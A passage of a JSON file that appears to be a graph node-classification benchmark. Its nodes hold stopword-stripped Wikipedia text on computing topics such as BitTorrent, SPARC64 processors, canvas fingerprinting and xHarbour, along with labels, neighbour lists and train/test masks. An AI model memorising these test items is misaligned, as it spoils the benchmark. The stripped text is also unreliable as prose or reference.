gillmor explained concept column ziff-davis december 2003 discussion spread quickly among bloggers ernest miller chris pirillo etc. article entitled broadcatching bittorrent scott raymond explained rss feed track content bittorrent ensures content integrity cryptographic hashing data feed subscribers receive uncorrupted content one first popular software clients free open source broadcatching miro free software clients penguintv katchtv also supporting broadcatching bittorrent web-service movedigital added ability make torrents available web application capable parsing xml standard rest-based interface 2006 though since discontinued additionally torrenthut developing similar torrent api provide features help bring torrent community web 2.0 standards alongside release first php application built using api called pep parse really simple syndication rss 2.0 feed automatically create seed torrent enclosure found feed since bittorrent makes large proportion total traffic isps chosen throttle slow bittorrent transfers reason methods developed disguise bittorrent traffic attempt thwart efforts protocol header encrypt phe message stream encryption/protocol encryption mse/pe features bittorrent clients attempt make bittorrent hard detect throttle november 2015 vuze bitcomet ktorrent transmission deluge µtorrent moopolice halite qbittorrent rtorrent latest official bittorrent client v6 support mse/pe encryption september 2006 reported software could detect throttle bittorrent traffic masquerading http traffic reports august 2007 indicated comcast preventing bittorrent seeding monitoring interfering communication peers protection efforts provided proxying client-tracker traffic via encrypted tunnel point outside comcast network comcast recently called truce bittorrent inc. intention shaping traffic protocol-agnostic manner questions ethics legality comcast behavior led renewed debate net neutrality united states general although encryption make difficult determine shared bittorrent vulnerable traffic analysis thus even mse/pe may possible isp recognize bittorrent also determine system longer downloading uploading data terminate connection injecting tcp rst reset flag packets another unofficial feature extension bittorrent metadata format proposed john hoffman implemented several indexing websites allows use multiple trackers per file one tracker fails others continue support file transfer implemented several clients bitcomet bittornado bittorrent ktorrent transmission deluge µtorrent rtorrent vuze frostwire trackers placed groups tiers tracker randomly chosen top tier tried moving next tier trackers top tier fail torrents multiple trackers decrease time takes download file also consequences bittorrent specification free use many clients open source bittorrent clients created common operating systems using variety programming languages official bittorrent client µtorrent qbittorrent transmission vuze bitcomet popular clients bittorrent implementations mldonkey torrentflux designed run servers example used centralize file sharing single dedicated server users share access network server-oriented bittorrent implementations also hosted hosting providers co-located facilities high bandwidth internet connectivity e.g. datacenter provide dramatic speed benefits using bittorrent regular home broadband connection services imageshack download files bittorrent user allowing download entire file http finished opera web browser supports bittorrent wyzo bitlet allows users download torrents directly browser using java applet increasing number hardware devices made support bittorrent include routers nas devices containing bittorrent-capable firmware like openwrt proprietary versions protocol implement drm encryption authentication found within managed clients pando unimplemented unofficial feature similarity enhanced transfer set technique improving speed peer-to-peer file sharing content distribution systems share data set proposed researchers pucha andersen kaminsky works spotting chunks identical data files exact near match one needed transferring data client exact data present experiments suggested set help greatly less popular files much popular data many peers already downloading andersen believes technique could immediately used developers bittorrent file sharing system bittorrent inc. working oversi new policy discover protocols query isp capabilities network architecture information oversi isp hosted netenhancer box designed improve peer selection helping peers find local nodes improving download speeds reducing loads isp network although protocol legal problems stem using protocol traffic copyright infringing works much controversy use bittorrent trackers bittorrent metafiles store file contents whether publishers bittorrent metafiles violate copyrights linking copyrighted works without authorization copyright holders controversial various jurisdictions pursued legal action websites host bittorrent trackers high-profile examples include closing suprnova.org torrentspy lokitorrent btjunkie mininova oink pink palace what.cd pirate bay torrent website formed swedish group noted legal section website letters replies subject alleged copyright infringements publicly displayed 31 may 2006 pirate bay servers sweden raided swedish police allegations mpaa copyright infringement however tracker running three days later study used value nbc universal merger comcast envisional examined 10,000 torrent swarms managed publicbt active downloaders excluding pornographic unidentifiable content found one swarm offered legitimate content united states 200,000 lawsuits filed copyright infringement bittorrent since 2010 30 april 2012 uk high court ordered five isps block bittorrent search engine pirate bay see list websites blocked united kingdom one concern udp flood attack bittorrent implementations often use µtp communication achieve high bandwidths underlying protocol used udp allows spoofing source addresses internet traffic possible carry denial-of-service attacks p2p lab environment users running bittorrent clients act amplifiers attack another service however always effective attack isps check source address correct leeches users download share bittorrent collaborative distributed platform section community wants solutions punish discourage behaviour several studies bittorrent indicated exist files containing malware available download via bittorrent particular one small sample indicated 18 executable programs available download contained malware another study claims much 14.5 bittorrent downloads contain zero-day malware bittorrent used distribution mechanism 47 zero-day malware found due sha1 collisions attacker alter execution path executable serving altered chunks victim downloading executable using bittorrent protocol despite fact proof concept exists attack may succeed limited cases small chunk size 32kb selecting larger chunks i.e 256kb amount resources required find sha1 collision tremendous makes attack virtually impossible",
    "neighbors": [
      11274,
      4623,
      534,
      535,
      2075,
      2076,
      10270,
      9766,
      5159,
      3121,
      574,
      8772,
      7248,
      7761,
      6747,
      3676,
      4194,
      5732,
      9325,
      9843,
      9332,
      4725,
      5749,
      119,
      9337,
      2170,
      8833,
      4229,
      2182,
      6280,
      4236,
      9868,
      10893,
      11413,
      6307,
      10924,
      7352,
      3770,
      4797,
      4289,
      708,
      7364,
      10950,
      1224,
      7885,
      6351,
      3792,
      6367,
      10977,
      3813,
      3819,
      7921,
      10995,
      253,
      8446,
      11029,
      3350,
      2328,
      4377,
      8986,
      10522,
      10020,
      3366,
      6444,
      8495,
      7488,
      11073,
      8520,
      4937,
      4429,
      6991,
      1362,
      4952,
      7515,
      5472,
      3428,
      2409,
      10090,
      1908,
      5499,
      11646,
      2432,
      899,
      8584,
      4490,
      10126,
      911,
      1935,
      8592,
      2965,
      9625,
      11674,
      5024,
      10149,
      10154,
      945,
      7102,
      2496,
      8640,
      11201,
      8644,
      9682,
      467,
      5085,
      479,
      7652,
      7660,
      10221,
      2555
    ],
    "mask": "Test"
  },
  {
    "node_id": 3429,
    "label": 2,
    "text": "IBM_7090/94_IBSYS:ibm 7090/94 ibsys ibsys discontinued tape-based operating system ibm supplied ibm 7090 ibm 7094 computers similar operating system several significant differences also called ibsys provided ibm 7040 ibm 7044 computers ibsys based fortran monitor system fms likely bell labs besys q.v rather share operating system ibsys really basic monitor program read control card images placed decks program data cards individual jobs ibsys control card began column 1 immediately followed control name selected various ibsys utility programs needed set run job card deck images read magnetic tapes prepared offline usually directly punched card reader",
    "neighbors": [
      2179,
      4996,
      6148,
      10883,
      7053,
      8077,
      9361,
      11153,
      6675,
      9468,
      789,
      5397,
      9619,
      11673,
      9370,
      6557,
      3359,
      10273,
      421,
      7848,
      6442,
      1323,
      7983,
      8879,
      7217,
      9139,
      10803,
      6325,
      7477,
      7733,
      10040,
      5562,
      573,
      1219,
      964,
      8388,
      6342,
      4423,
      1235,
      7507,
      2519,
      863,
      3938,
      5603,
      868,
      5220,
      9829,
      6248,
      5492,
      375,
      2168,
      3323,
      2172,
      2813,
      8063
    ],
    "mask": "Test"
  },
  {
    "node_id": 3430,
    "label": 2,
    "text": "The_Hessling_Editor:hessling editor hessling editor open source text editor first released august 1992 ten years written maintained mark hessling along original author also maintainer regina open source rexx interpreter ported unix platforms according developers text editor modeled vm/cms editor xedit adding best features mansfield software kedit folding controlled command permits one display work lines file contain given pattern example command codice_1 display lines include string global changes one makes slice example replace string command reflected file cases convenient way make global changes file order restore visibility lines one needs enter without target string similar xedit uses ibms rexx macro language makes highly configurable versatile provides ability create powerful extensions editor and/or customize specialized needs example one create edit commands would allows one manipulate columns text e.g copy/move insert/delete column text within file rexx one also integrate os commands external functions edit session since version 3.0 also user-configurable syntax highlighting xedit gui editors syntax highlighting language definition codice_2 file format comparable kedit codice_3 format free software distributed terms gnu general public license available many operating systems posix unix platforms program text-mode native x11 qnx os/2 dos beos amiga windows 95/98/me/nt/2000/xp",
    "neighbors": [
      6797,
      7983,
      5492,
      5463,
      3323,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 3431,
    "label": 3,
    "text": "SPARC64_V:sparc64 v sparc64 v zeus sparc v9 microprocessor designed fujitsu sparc64 v basis series successive processors designed servers later supercomputers servers series sparc64 v+ vi vi+ vii vii+ x x+ xii sparc64 vi successors vii+ used fujitsu sun later oracle sparc enterprise m-series servers addition servers version sparc64 vii also used commercially available fujitsu fx1 supercomputer october 2017 sparc64 xii latest server processor used fujitsu oracle m12 servers supercomputer series based sparc64 vii sparc64 viifx ixfx xifx sparc64 viiifx used k computer sparc64 ixfx commercially available primehpc fx10 july 2016 sparc64 xifx latest supercomputer processor used fujitsu primehpc fx100 supercomputer late 1990s hal computer systems subsidiary fujitsu designing successor sparc64 gp sparc64 v. first announced microprocessor forum 1999 hal sparc64 v would operated 1 ghz wide superscalar organization superspeculation l1 instruction trace cache small fast 8 kb l1 data cache separate l2 caches instructions data designed fujitsu cs85 process 0.17 μm cmos process six levels copper interconnect would consisted 65 million transistors 380 mm die originally scheduled late 2001 release fujitsu granpower servers canceled mid-2001 hal closed fujitsu replaced fujitsu design first fujitsu sparc64 vs fabricated december 2001 operated 1.1 1.35 ghz fujitsu 2003 sparc64 roadmap showed company planned 1.62 ghz version release late 2003 early 2004 canceled favor sparc64 v+ sparc64 v used fujitsu primepower servers sparc64 v first presented microprocessor forum 2002 introduction highest clock frequency sparc 64-bit server processors production highest spec rating sparc processor sparc64 v four-issue superscalar microprocessor out-of-order execution based fujitsu gs8900 mainframe microprocessor sparc64 v fetches eight instructions instruction cache first stage places 48-entry instruction buffer next stage four instructions taken buffer decoded issued appropriate reserve stations sparc64 v six reserve stations two serve integer units one address generators two floating-point units one branch instructions integer address generator floating-point unit eight-entry reserve station reserve station dispatch instruction execution unit instruction dispatched firstly depends operand availability age older instructions given higher priority newer ones reserve stations dispatch instructions speculatively speculative dispatch instructions dispatched execution units even operands yet available execution begins stage six six instructions dispatched register files read stage seven sparc architecture separate register files integer floating-point instructions integer register file eight register windows jwr joint work register contains 64 entries eight read ports two write ports jwr contains subset eight register windows previous current next register windows purpose reduce size register file microprocessor operate higher clock frequencies floating-point register file contains 64 entries six read ports two write ports execution begins stage nine six execution units two integer two loads stores two floating-point two integer execution units designated exa exb arithmetic logic unit alu shift unit exa multiply divide units loads stores executed two address generators ags designated aga agb simple alus used calculate virtual addresses two floating-point units fpus designated fla flb fpu contains adder multiplier fla graphics unit attached execute add subtract multiply divide square root multiply–add instructions unlike successor sparc64 vi sparc64 v performs multiply–add separate multiplication addition operations thus two rounding errors graphics unit executes visual instruction set vis instructions set single instruction multiple data simd instructions instructions pipelined except divide square root executed using iterative algorithms fma instruction implemented reading three operands operand register multiplying two operands forwarding result third operand adder adding produce final result results execution units loads written register file maintain program order written update buffers reside committed sparc64 v separate update buffers integer floating-point units 32 entries integer register eight read ports four write ports half write ports used results integer execution units half data returned loads floating-point update buffer six read ports four write ports commit takes place stage ten earliest sparc64 v commit four instructions per cycle stage eleven results written register file becomes visible software sparc64 v two-level cache hierarchy first level consists two caches instruction cache data cache second level consists on-die unified cache level 1 l1 caches capacity 128 kb two-way set associative 64-byte line size virtually indexed physically tagged instruction cache accessed via 256-bit bus data cache accessed two 128-bit buses data cache consists eight banks separated 32-bit boundaries uses write-back policy data cache writes l2 cache 128-bit unidirectional bus second level cache capacity 1 2 mb set associativity depends capacity microprocessor 128-bit system bus operates 260 mhz bus operate two modes single-data rate sdr double-data ddr rate yielding peak bandwidth 4.16 8.32 gb/s respectively sparc64 v consisted 191 million transistors 19 million contained logic circuits fabricated 0.13 µm eight-layer copper metallization complementary metal–oxide–semiconductor cmos silicon insulator soi process die measured 18.14 mm 15.99 mm die area 290 mm 1.3 ghz sparc64 v power dissipation 34.7 w. fujitsu primepower servers use sparc64 v supply slightly higher voltage microprocessor enable operate 1.35 ghz increased power supply voltage operating frequency increased power dissipation ~45 w. sparc64 v+ code-named olympus-b development sparc64 v. improvements sparc64 v included higher clock frequencies 1.82–2.16 ghz larger 3 4 mb l2 cache first sparc64 v+ 1.89 ghz version shipped september 2004 fujitsu primepower 650 850 december 2004 1.82 ghz version shipped primepower 2500 versions 3 mb l2 cache february 2006 four versions introduced 1.65 1.98 ghz versions 3 mb l2 caches shipped primepower 250 450 2.08 2.16 ghz versions 4 mb l2 caches shipped mid-range high-end models contained approximately 400 million transistors 18.46 mm 15.94 mm die area 294.25 mm fabricated 90 nm cmos process ten levels copper interconnect sparc64 vi code-named olympus-c two-core processor first multi-core sparc64 processor succeeded sparc64 v+ fabricated fujitsu 90 nm 10-layer copper cmos silicon insulator soi process enabled two cores l2 cache integrated die core modified sparc64 v+ processor one main improvements addition two-way coarse-grained multi-threading cmt fujitsu called vertical multi-threading vmt cmt thread executed determined time-sharing thread executing long-latency operation execution switched thread addition cmt required duplication program counter control integer floating-point registers one set every thread floating-point fused multiply-add fma instruction also added first sparc processor cores share 6 mb on-die unified l2 cache l2 cache 12-way set associative 256-byte lines cache accessed via two unidirectional buses 256-bit read bus 128-bit write bus sparc64 vi new system bus jupiter bus sparc64 vi consisted 540 million transistors die measures 20.38 mm 20.67 mm 421.25 mm sparc64 vi originally introduced mid-2004 fujitsu primepower servers development primerpowers canceled fujitsu sun microsystems announced june 2004 would collaborate new servers called advanced product line apl servers scheduled introduced mid-2006 delayed april 2007 introduced sparc enterprise sparc64 vi processors featured sparc enterprise announcement 2.15 ghz version 5 mb l2 cache 2.28 2.4 ghz versions 6 mb l2 caches sparc64 vii previously called sparc64 vi+ code-named jupiter development sparc64 vi announced july 2008 quad-core microprocessor core capable two-way simultaneous multithreading smt replaces two-way coarse-grained multithreading termed vertical multithreading vmt fujitsu thus execute eight threads simultaneously changes include ras features integer register file protected ecc number error checkers increased around 3,400 consists 600 million transistors 21.31 mm × 20.86 mm 444.63 mm large fabricated fujitsu 65 nm cmos copper interconnect process sparc64 vii featured sparc enterprise socket-compatible predecessor sparc64 vi field-upgradeable sparc64 viis could coexist whilst operating native clock frequency alongside sparc64 vis first versions sparc64 vii 2.4 ghz version 5 mb l2 cache used sparc enterprise m4000 m5000 2.52 ghz version 6 mb l2 cache 28 october 2008 2.52 ghz version 5 mb l2 cache introduced sparc enterprise m3000 13 october 2009 fujitsu sun introduced new versions sparc64 vii code-named jupiter+ 2.53 ghz version 5.5 mb l2 cache m4000 m5000 2.88 ghz version 6 mb l2 cache m8000 m9000 12 january 2010 2.75 ghz version 5 mb l2 cache introduced m3000 sparc64 vii+ jupiter-e referred m3 oracle development sparc64 vii clock frequency increased 3 ghz l2 cache size doubled 12 mb version announced 2 december 2010 high-end sparc enterprise m8000 m9000 servers improvements resulted approximately 20 increase overall performance 2.66 ghz version mid-range m4000 m5000 models 12 april 2011 2.86 ghz version two four cores 5.5 mb l2 cache announced low-end m3000 vii+ socket-compatible predecessor vii existing high-end sparc enterprise m-series servers able upgrade vii+ processors field sparc64 viiifx venus eight-core processor based sparc64 vii designed high-performance computing hpc result viiifx succeed vii existed concurrently consists 760 million transistors measures 22.7 mm 22.6 513.02 mm fabricated fujitu 45 nm cmos process copper interconnects 1,271 i/o pins viiifx peak performance 128 gflops typical power consumption 58 w 30 °c efficiency 2.2 gflops/w viiifx four integrated memory controllers total eight memory channels connects 64 gb ddr3 sdram peak memory bandwidth 64 gb/s viiifx developed next-generation supercomputer project also called kei soku keisenki project keisoku initiated japan ministry education culture sports science technology january 2006 project aimed produce world fastest supercomputer performance 10 pflops march 2011 companies contracted develop supercomputer fujitsu hitachi nec supercomputer originally envisioned hybrid architecture containing scalar vector processors fujitsu-designed viiifx scalar processor vector processor jointly designed hitachi nec however due financial crisis 2007–2008 hitachi nec announced may 2009 would leave project manufacturing hardware responsible would result financial losses afterwards fujitsu redesigned supercomputer use viiifx processor type 2010 supercomputer would built project named k computer located riken advanced institute computational science aics kobe japan obtains performance 88,128 viiifx processors june 2011 top500 project committee announced k computer still incomplete 68,544 processors topped linpack benchmark 8.162 pflops realizing 93 peak performance making fastest supercomputer world time viiifx core based sparc64 vii numerous modifications hpc namely high performance computing-arithmetic computational extensions hpc-ace fujitsu-designed extension sparc v9 architecture front-end coarse-grained multi-threading removed l1 instruction cache halved size 32 kb number branch target address cache btac entries reduced 1,024 8,192 associativity reduced two eight extra pipeline stage inserted instruction decoder stage accommodated greater number integer floating-point registers defined hpc-ace sparc v9 architecture designed 32 integer 32 floating-point number registers sparc v9 instruction encoding limited number registers specifiable 32 specify extra registers hpc-ace prefix instruction would immediately follow one two sparc v9 instructions prefix instruction contained primarily portions register numbers could fit within sparc v9 instruction extra pipeline stage four sparc v9 instructions combined two prefix instructions preceding stage combined instructions decoded next pipeline stage back-end also heavily modified number reservation station entries branch integer instructions reduced six ten respectively integer floating-point register files registers added integer register file gained 32 total 256 floating-point registers extra integer registers part register windows defined sparc v9 always accessible via prefix instruction 256 floating-point registers could used scalar floating-point instructions integer floating-point simd instructions extra pipeline stage added beginning floating-point execution pipeline access larger floating-point register file 128-bit simd instructions hpc-ace implemented adding two extra floating-point units total four simd execution perform four single- double-precision fused-multiply-add operations eight flops per cycle number load queue entries increased 20 16 l1 data cache halved size 32 kb number commit stack entries determined number instructions could in-flight back-end reduced 48 64 sparc64 ixfx improved version sparc64 viiifx designed fujitsu lsi first revealed announcement primehpc fx10 supercomputer 7 november 2011 along primehpc fx10 commercialization technologies first appeared viiifx k computer compared viiifx organizational improvements included doubling number cores 16 doubling amount shared l2 cache 12 mb increasing peak ddr3 sdram memory bandwidth 85 gb/s ixfx operates 1.848 ghz peak performance 236.5 gflops consumes 110 w power efficiency 2 gflops per watt consisted 1 billion transistors implemented 40 nm cmos process copper interconnects sparc64 x 16-core server microprocessor announced 2012 used fujitsu m10 servers also marketed oracle sparc64 x based sparc64 vii+ significant enhancements core chip organization cores improved inclusion pattern history table branch prediction speculative execution loads execution units support hpc-ace extension originally sparc64 viiifx deeper pipeline 3.0 ghz clock frequency accelerators cryptography database decimal floating-point number arithmetic conversion functions 16 cores share unified 24 mb 24-way set-associative l2 cache chip organization improvements include four integrated ddr3 sdram memory controllers glueless four-way symmetrical multiprocessing ten serdes channels symmetrical multiprocessing scalability 64 sockets two integrated pci express 3.0 controllers sparc64 x contains 2.95 billion transistors measures 23.5 mm 25 mm 637.5 mm fabricated 28 nm cmos process copper interconnects sparc64 x+ enhanced sparc64 x processor announced 2013 features minor improvements core organization higher 3.5 ghz clock frequency obtained better circuit design layout contained 2.99 billion transistors measured 24 mm 25 mm 600 mm fabricated process sparc64 x 8 april 2014 3.7 ghz speed-binned parts became available response introduction new xeon e5 e7 models intel impending introduction power8 ibm fujitsu introduced sparc64 xifx august 2014 hot chips symposium used fujitsu primehpc fx100 supercomputer succeeded primehpc fx10 xifx operates 2.2 ghz peak performance 1.1 tflops consists 3.75 billion transistors fabricated taiwan semiconductor manufacturing company 20 nm high-κ metal gate hkmg process microprocessor report estimated die area 500 mm typical power consumption 200 w. xifx 34 cores 32 compute cores used run user applications 2 assistant cores used run operating system system services delegation user applications operating system dedicated cores improves performance ensuring private caches compute cores shared disrupted non-application instructions data 34 cores organized two core memory groups cmgs consisting 16 compute cores 1 assistant core sharing 12 mb l2 unified cache division cores cmgs enabled 34 cores integrated single die easing implementation cache coherence avoiding need l2 cache shared 34 cores two cmgs share memory ccnuma organization xifx core based sparc64 x+ organizational improvements xifx implements improved version hpc-ace extensions hpc-ace2 doubled width simd units 256 bits added new simd instructions compared sparc64 ixfx xifx improvement factor 3.2 double precision 6.1 single precision complement increased width simd units l1 cache bandwidth increased 4.4 tb/s improvements soc organization memory interconnect interfaces integrated memory controllers replaced four hybrid memory cube hmc interfaces decreased memory latency improved memory bandwidth according microprocessor report ixfx first processor use hmcs xifx connected 32 gb memory provided eight 4 gb hmcs hmcs 16-lane versions lane operating 15 gbit/s cmg two hmc interfaces hmc interface connected two hmcs via ports cmg 240 gb/s 120 gb/s 120 gb/s memory bandwidth xifx replaced ten serdes channels external tofu interconnect controller ten-port integrated controller second-generation tofu2 interconnect tofu2 6d mesh/torus network 25 gb/s full-duplex bandwidth 12.5 gb/s per direction 125 gb/s ten ports improved routing architecture sparc64-xii cores run 3.9 ghz 20 nanometer processes tsmc l3 cache 5.5 billion transistors 153 gb/sec memory bandwidth unix vendor able run solaris 10 bare metal fujitsu announced international supercomputing conference june 2016 future exascale supercomputer feature processors design implement armv8 architecture processors also implement extensions armv8 architecture equivalent hpc-ace2 fujitsu developing arm holdings",
    "neighbors": [
      6926,
      528,
      7702,
      1309,
      6815,
      8355,
      36,
      9126,
      8231,
      9766,
      1707,
      10288,
      9137,
      7218,
      9920,
      8900,
      8266,
      2895,
      2901,
      9302,
      10837,
      2394,
      731,
      604,
      7770,
      1503,
      3431,
      7911,
      10734,
      8815,
      1776,
      4465,
      1399,
      9976,
      3323,
      10108
    ],
    "mask": "Test"
  },
  {
    "node_id": 3432,
    "label": 7,
    "text": "CloudSim:cloudsim cloudsim framework modeling simulation cloud computing infrastructures services originally built primarily cloud computing distributed systems clouds laboratory university melbourne australia cloudsim become one popular open source cloud simulators research academia cloudsim completely written java initially developed stand-alone cloud simulator cloudsim extended independent researchers multiple tutorials blog posts available cloudsim addition online course introducing cloudsim simulation framework covering installation architecture execution description sample simulations quick references quick tutorials flows",
    "neighbors": [
      4194,
      11343
    ],
    "mask": "None"
  },
  {
    "node_id": 3433,
    "label": 4,
    "text": "User_behavior_analytics:user behavior analytics user behavior analytics uba defined gartner cybersecurity process detection insider threats targeted attacks financial fraud uba solutions look patterns human behavior apply algorithms statistical analysis detect meaningful anomalies patterns—anomalies indicate potential threats instead tracking devices security events uba tracks system users big data platforms like apache hadoop increasing uba functionality allowing analyze petabytes worth data detect insider threats advanced persistent threats problem uba responds described nemertes research ceo johna till johnson security systems provide much information tough uncover information truly indicates potential real attack analytics tools help make sense vast amount data siem ids/ips system logs tools gather uba tools use specialized type security analytics focuses behavior systems people using uba technology first evolved field marketing help companies understand predict consumer-buying patterns turns uba extraordinarily useful security context developments uba technology led gartner evolve category user entity behavior analytics ueba september 2015 gartner published market guide user entity analytics vice president distinguished analyst avivah litan provided thorough definition explanation ueba referred earlier gartner reports much depth expanding definition uba includes devices applications servers data anything ip address moves beyond fraud-oriented uba focus broader one encompassing malicious abusive behavior otherwise went unnoticed existing security monitoring systems siem dlp addition entity reflects devices may play role network attack may also valuable uncovering attack activity end users compromised malware lay dormant go undetected months rather trying find outsider entered uebas allow quicker detection using algorithms detect insider threats particularly computer security market many vendors ueba applications differentiated whether designed monitor on-premises cloud-based software service saas applications methods obtain source data type analytics use i.e. packaged analytics user-driven vendor-written service delivery method i.e. on-premises cloud-based according 2015 market guide released gartner ueba market grew substantially 2015 ueba vendors grew customer base market consolidation began gartner client interest ueba security analytics increased report projected next three years leading ueba platforms become preferred systems security operations investigations organizations serve be—and cases already is—much easier discover security events analyze individual offenders ueba many legacy security monitoring systems",
    "neighbors": [
      4194,
      612,
      5351,
      4072,
      5577,
      10283,
      10539,
      4689,
      11473,
      467,
      7893,
      5722,
      7515,
      5245,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 3434,
    "label": 8,
    "text": "Canvas_fingerprinting:canvas fingerprinting canvas fingerprinting one number browser fingerprinting techniques tracking online users allow websites identify track visitors using html5 canvas element instead browser cookies similar means technique received wide media coverage 2014 researchers princeton university ku leuven university described paper web never forgets canvas fingerprinting works exploiting html5 canvas element described acar et al variations graphics processing unit gpu installed graphics driver cause variations fingerprint fingerprint stored shared advertising partners identify users visit affiliated websites profile created user browsing activity allowing advertisers target advertising user inferred demographics preferences since fingerprint primarily based browser operating system installed graphics hardware uniquely identify users small-scale study 294 participants amazon mechanical turk experimental entropy 5.7 bits observed authors study suggest entropy could likely observed wild patterns used fingerprint sufficient uniquely identify users fingerprint could combined sources entropy provide unique identifier claimed technique effectively fingerprinting gpu entropy orthogonal entropy previous browser fingerprint techniques screen resolution browser javascript capabilities tor project reference documentation states plugins plugin-provided information believe html5 canvas single largest fingerprinting threat browsers face today tor browser notifies user canvas read attempts provides option return blank image data prevent fingerprinting however tor browser currently unable distinguish legitimate uses canvas element fingerprinting efforts warning taken proof website intent identify track visitors browser add-ons like privacy badger donottrackme adblock plus manually enhanced easyprivacy list able block third-party ad network trackers block canvas fingerprinting provided tracker served third party server opposed implemented visited website may 2012 keaton mowery hovav shacham researchers university california san diego wrote paper pixel perfect fingerprinting canvas html5 describing html5 canvas could used create digital fingerprints web users social bookmarking technology company addthis began experimenting canvas fingerprinting early 2014 potential replacement cookies 5 top 100,000 websites used canvas fingerprinting deployed according addthis ceo richard harris company used data collected tests conduct internal research users able install opt-out cookie computer prevent tracked addthis canvas fingerprinting software developer writing forbes stated device fingerprinting utilized purpose preventing unauthorized access systems long used tracking users without consent 2014 technique widespread many websites least dozen high-profile web ads user tracking suppliers using",
    "neighbors": [
      10658,
      3462,
      1001,
      9395,
      11319,
      7965
    ],
    "mask": "Test"
  },
  {
    "node_id": 3435,
    "label": 9,
    "text": "XHarbour:xharbour xharbour free multi-platform extended clipper compiler offering multiple graphic terminals gts including console drivers guis hybrid console/guis xharbour backward-compatible clipper supports many language syntax extensions greatly extended run-time libraries extensive third party support like dynamic languages xharbour also available scripting language standalone application linkable library ms activescript engine windows script host html asp utilizing interpreter written xharbour language xharbour usenet newsgroup comp.lang.xharbour active community discussing xharbour related questions xharbour 6 scalar types nil string date logical number pointer 4 complex types array object codeblock hash scalar holds single value string number reference type arrays ordered lists scalars complex types indexed number starting 1 hashes associative arrays unordered collections type values indexed associated key may scalar complex type literal static representation scalar types complex types may also represent literal values hashes may use type including hashes key element hashes arrays may contain type value member including nesting arrays hashes codeblocks may references variables procedure/function method defined codeblocks may returned value means argument passed reference case codeblock outlive routine defined variables references detached variable detached variables maintain value long codeblock referencing still exists values shared codeblock may access variables codeblock outlive containing routine evaluated within lifetime routine defined changes detached variables means evaluation reflected back parent routine codeblocks evaluated number times means eval blockexp function types assigned named variables named variable identifiers 1 63 characters long start a-z|_ consist characters a-z|0-9|_ maximum 63 characters named variables case sensitive variables one following scopes local static global resolved compile time thus much faster private public variables dynamic entities accessed means runtime symbol table reason local static global variables exposed macro compiler macro code attempts reference generate runtime error due dynamic nature private public variables created destroyed runtime accessed modified means runtime macros accessed modified codeblocks created fly basic control structures include standard dbase clipper control structures well additional ones inspired c java programming languages conditionexp statement assignment expression evaluated prior first loop iteration expression evaluated compared value control variable prior iteration loop terminated evaluates numeric value greater numeric value control variable optional step expression evaluated iteration prior deciding whether perform next iteration var variable value scalar complex respective element collection value collection expression may array type combinations types hash table object type condexp ... represents 0 statement condition expression evaluate logical value case construct logically equivalent xharbour supports switch construct inspired c implementation switch begin sequence begin sequence structure allows well behaved abortion sequence even crossing nested procedures/functions means called procedure/function may issue break statement break expression force unfolding nested procedure/functions way back first outer begin sequence structure either respective end statement recover clause present break statement may optionally pass type expression may accepted recover statement allow recovery handing additionally xharbour error object supports candefault canretry cansubstitute properties allows error handlers perform preparations request retry operation resume return value replace expression triggering error condition try try construct similar begin sequence construct except automatically integrates error handling error intercepted recovered means catch statement forwarded outer catch handler otherwise finally section guaranteed executed try catch sections forward flow control means return break throw static procedure someprocedurename procedures/functions xharbour specified keywords codice_1 codice_2 naming rules variables 63 characters non case sensitive procedures functions may qualified scope qualifier static restrict usage scope module defined init exit optional qualifiers flag procedure automatically invoked calling application startup procedure quitting application respectively parameters passed procedure/function appear subroutine local variables may accept type including references changes argument variables reflected respective variables passed calling procedure/function/method unless explicitly passed reference using prefix procedure return value used expression context produce nil value function may return type means return statement anywhere body definition example procedure definition function call follows xharbour extends clipper replaceable database drivers rdd approach offers multiple rdds dbf dbfntx dbfcdx dbfdbt dbffpt xharbour multiple rdds used single application new logical rdds defined combination rdd rdd architecture allows inheritance given rdd may extend functionality existing rdd 3rd party rdds like rddsql rddsix rmdbfcdx advantage database server mediator exemplify rdd architecture features xharbour also offers odbc support means oop syntax ado support means ole one powerful features xbase languages macro operator xharbour ’ implementation macro operator allows runtime compilation valid xharbour expression compiled expression may used value i.e right side assignment compiled expression may used resolve left side assignment i.e private public variables database field additionally macro operator may compile execute function calls complete assignments even list arguments result macro may used resolve contexts compiled application iow xharbour application may extended and/or modified runtime compile execute additional code demand xharbour implementation feature complete xharbour interpreter xbscript uses heavily compile xharbour scripts syntax text value expression ... compiled value resulting execution compiled code result short form someid short form someid postfix typical hello world program would enclosed explicit procedure xharbour also available interpreted language flavors scripting engines",
    "neighbors": [
      6112,
      4614,
      6631,
      10921,
      5677,
      2903,
      2929,
      3350,
      3767,
      2045,
      5374
    ],
    "mask": "None"
  },
  {
    "node_id": 3436,
    "label": 3,
    "text": "Barbarian_(1987_video_game):barbarian 1987 video game barbarian 1987 computer platform game psygnosis first developed atari st ported amiga commodore 64 ms-dos msx amstrad cpc zx spectrum amiga port released 1987 others released 1988 like early psygnosis titles cover artwork part red dragon figure/landscape popular fantasy artist roger dean game spawned 1991 sequel barbarian ii released alongside leander ork platform-based action-adventures psygnosis game opens striking—for era—animation muscle-bound barbarian cutting chain sword amiga atari st versions animation accompanied loud digital sound effect game player hegor barbarian must traverse several dungeons underground habitats defeat brother evil sorcerer necron sword bow arsenal weapons running jumping many platform games comprises large part gameplay title game used unique control system make lack one joystick button many systems player would first press one button menu actions would appear along bottom screen player selected desired action cycling choices joystick pressing button desired action highlighted original versions game tried emulate visual style game cover opening animation game used detailed colorful sprites variety thoughtful sound effects accompany onscreen action dos version played digitized speech opening sequence featured sound effects using pc speaker game reviewed 1989 dragon 150 courtney harrington role computers column harrington gave game 4 5 stars review amstrad action issue 40 gave game 81 stating fun lacking long term",
    "neighbors": [
      10931,
      9166,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 3437,
    "label": 5,
    "text": "Message_Send_Protocol:message send protocol message send protocol msp application layer protocol used send short message nodes network original version protocol published 1990 updated message send protocol 2 1992 one message send service defined connection-based application tcp service listens tcp connections port 18 connection established short message transmitted sender receiver connection sender closes connection sending message another message send service defined datagram-based application udp service listens udp datagrams port 18 datagram received receiver answering datagram sent back sender containing exactly data",
    "neighbors": [
      6993,
      10924,
      11413
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3438,
    "label": 9,
